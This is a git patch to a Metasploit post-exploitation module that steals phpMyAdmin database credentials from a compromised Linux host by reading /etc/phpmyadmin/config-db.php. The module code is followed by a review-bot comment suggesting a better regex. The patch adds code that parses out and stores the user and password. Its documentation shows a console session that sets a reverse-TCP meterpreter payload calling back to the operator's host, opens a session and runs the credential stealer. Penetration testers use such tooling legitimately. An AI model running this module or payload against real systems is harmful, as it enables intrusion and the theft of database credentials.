From 5861087061c3f3793224143a0c636961c7dc1921 Mon Sep 17 00:00:00 2001
From: Jacob Robles
Date: Mon, 10 Sep 2018 11:49:52 -0500
Subject: [PATCH] Land #10598, Store Credentials Found with PhpMyAdmin Password Extractor
---
.../post/linux/gather/phpmyadmin_credsteal.md | 54 +++++++++----------
.../post/linux/gather/phpmyadmin_credsteal.rb | 29 +++++++---
2 files changed, 48 insertions(+), 35 deletions(-)
diff --git a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
index e848c15634..ae077120c7 100644
--- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
+++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
@@ -15,36 +15,34 @@ This post module gathers PhpMyAdmin Creds from target Linux machine.
 ## Scenarios
 ```
-msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1
-[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400
+msf5 > use multi/handler
+msf5 exploit(multi/handler) > set lhost 192.168.37.1
+lhost => 192.168.37.1
+msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > run
-msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
-msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1
-SESSION => 1
-msf post(linux/gather/phpmyadmin_credsteal) > exploit
+[*] Started reverse TCP handler on 192.168.37.1:4444
+[*] Sending stage (816260 bytes) to 192.168.37.226
+[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500
+
+meterpreter > background
+[*] Backgrounding session 2...
+msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
+msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2
+session => 2
+msf5 post(linux/gather/phpmyadmin_credsteal) > run
+
+
 PhpMyAdmin Creds Stealer!
 [+] PhpMyAdmin config found!
-[+] Extracting config file!
-
-
+msf5 post(linux/gather/phpmyadmin_credsteal) >
+
 ```
diff --git a/modules/post/linux/gather/phpmyadmin_credsteal.rb b/modules/post/linux/gather/phpmyadmin_credsteal.rb
index 7a71a794bc..df6ed91ac2 100644
--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -25,32 +25,47 @@ class MetasploitModule < Msf::Post
 ))
 end
- def run
+ def parse_creds(contents)
+ db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first
+ db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first
+ unless db_user && db_pass
+ print_error("Couldn't find PhpMyAdmin credentials")
+ return
+ end
+
+ print_good("User: #{db_user}")
+ print_good("Password: #{db_pass}")
+
+ print_status("Storing credentials...")
+ store_valid_credential(user: db_user, private: db_pass)
+ end
+
+ def run
 print_line("\nPhpMyAdmin Creds Stealer!\n")
- cred_dump = ""
 if session.platform.include?("windows")
 print_error("This module is not compatible with windows")
 return
 end
- conf_path= "/etc/phpmyadmin/config-db.php"
+ conf_path = "/etc/phpmyadmin/config-db.php"
 unless file_exist?(conf_path)
 print_error("#{conf_path} doesn't exist on target")
 return
 end
 print_good('PhpMyAdmin config found!')
- print_good("Extracting Creds")
 res = read_file(conf_path)
 unless res
 print_error("You may not have permissions to read the file.")
 return
 end
- cred_dump << res
- p = store_loot('phpmyadmin_conf', 'text/plain', session, cred_dump, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
- print_good("Credentials saved in #{p}")
+ print_good("Extracting creds")
+ parse_creds(res)
+
+ p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
+ print_good("Config file located at #{p}")
 end
 end
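Review bot: The capture in `parse_creds` uses a greedy `(.*)` between loosely paired quote classes (`['"](.*)['"];`), so a value containing the other quote character, or any `';` / `";` later on the same line, is captured together with the surrounding text, and an `'…"` pair is accepted as well; tying the closing quote to the opening one with a lazy match is more precise, e.g. `db_user = contents[/\$dbuser\s*=\s*(['"])(.*?)\1;/, 2]` and likewise `db_pass = contents[/\$dbpass\s*=\s*(['"])(.*?)\1;/, 2]`. Note also that `unless db_user && db_pass` does not reject empty strings, so `$dbpass='';` is reported and stored as a credential with an empty password; if storing a blank password is intended (plausible for a database account), a one-line comment saying so would prevent a later "fix". `parse_creds` has no header comment; a short one such as `# Extracts $dbuser/$dbpass from the contents of config-db.php, prints them and stores them via store_valid_credential; run saves the raw file as loot separately` would tell a reader why both the credential and the loot paths exist. Whether `store_valid_credential` is in scope depends on the module's report mixin, which is outside this hunk.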